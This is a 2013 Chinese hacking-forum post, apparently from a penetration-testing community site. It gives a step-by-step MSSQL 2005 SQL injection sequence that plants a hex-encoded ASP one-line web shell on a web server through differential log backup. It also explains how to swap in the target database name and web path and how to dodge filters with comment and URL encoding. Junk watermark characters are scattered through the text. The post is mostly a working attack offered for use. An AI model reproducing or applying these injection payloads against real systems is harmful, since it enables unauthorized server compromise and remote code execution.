中国网络渗透测试联盟

标题: mssql2005 DB权限导出一句话 [打印本页]
作者: admin    时间: 2013-7-16 20:32
标题: mssql2005 DB权限导出一句话
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。
- t$ D/ s5 n- }& y/ ]7 r* \" C/ A
2 M8 g, D: w% F$ X6 M" C
* ~+ Q8 H8 _* v6 E& B后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。
. C& G$ p4 v* B* f ) v& s/ r# K2 |! J/ h
第一步
% E* e' x# }& U( p4 i. v7 ?* O; X;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--
) U' s1 f0 i& D; R/ r# S
* w$ o  U4 s* W- i/ B0 {' k第二步:
' h; h7 n6 v/ |2 ?* E% E0 o;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
" w/ m- }% f; n
% a. I. R3 o) [' t& g$ G5 [第三步
. t% o& J1 M) T7 k;drop/**/table/**/[itpro]-- 9 L; E' d2 _# u: S; s* X  C

0 Z9 W2 n& v0 }  Y# d第四步
$ i" d' E6 B6 V;create/**/table/**/[itpro]([a]/**/image)-- / w! V3 M1 j! c( u. Z- l+ z; a

8 v8 |' a. \0 q2 P) a. W第五步
; B6 q: ?' n# Z+ g+ E5 k) J4 K( u;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
' o+ q4 P" z1 @) q# |! }8 f# X( D
( V1 Y% a3 c0 N' ?$ W/ ~第六步 : W( T1 W8 q) E5 z* t
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--
3 c/ H$ |& _* m4 S$ B7 d 2 a; i" J1 K8 v& i7 J
第七步 4 q( q) S, C# g2 Y) X
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
0 f8 H( M1 @' [
! @; |/ `8 ]. _' r第八步
! |- H( V% L* ]1 h/ v# m2 Q;drop/**/table/**/[itpro]--
! ?2 L9 k% @3 j, u ) R7 v  W3 g3 q) O' S% ^/ W7 X$ z
第九步 ; D: D4 I- L& ?* c  Y% Z6 M
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
5 f/ L- h# N0 V* m7 X 2 p/ ^- h, g* ?5 m9 p
其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
! b7 _( I; {8 u



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2